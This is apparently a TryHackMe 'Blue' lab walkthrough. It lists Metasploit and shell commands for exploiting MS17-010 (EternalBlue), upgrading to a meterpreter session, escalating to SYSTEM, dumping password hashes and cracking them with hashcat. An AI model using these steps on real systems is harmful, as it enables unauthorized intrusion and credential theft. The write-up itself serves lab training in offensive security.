TryHackMe: Blue (Eternal Blue)

[ TASK 1 ]: Recon

nmap -sC -sV -Pn <machine_ip>
  • -sC = script scan
  • -sV = version detection
  • -Pn = doesn't send ping probes to the machine
nmap --script vuln -Pn <machine_ip>

[ TASK 2 ]: Gain Access

msfconsole
search ms17-010
use 2
show options
set RHOSTS <machine_ip>
exploit
ctrl+z

[ TASK 3 ]: Escalate

search shell_to_meterpreter
use 0
show options
set session 1
run
show sessions
sessions -i 2
getsystem
getuid
ps
migrate -P 2740

[ TASK 4 ]: Cracking

hashdump
apt-get install hashcat
hashcat -a 0 -m 1000 hashes.txt <location_of_the_wordlist>

[ TASK 5 ]: Find Flags!

search -f flag*.txt
  1. pwd = print the current working directory
  2. dir = list the files in the current directory
  3. cd .. = go back
  4. cat = view the contents of the file
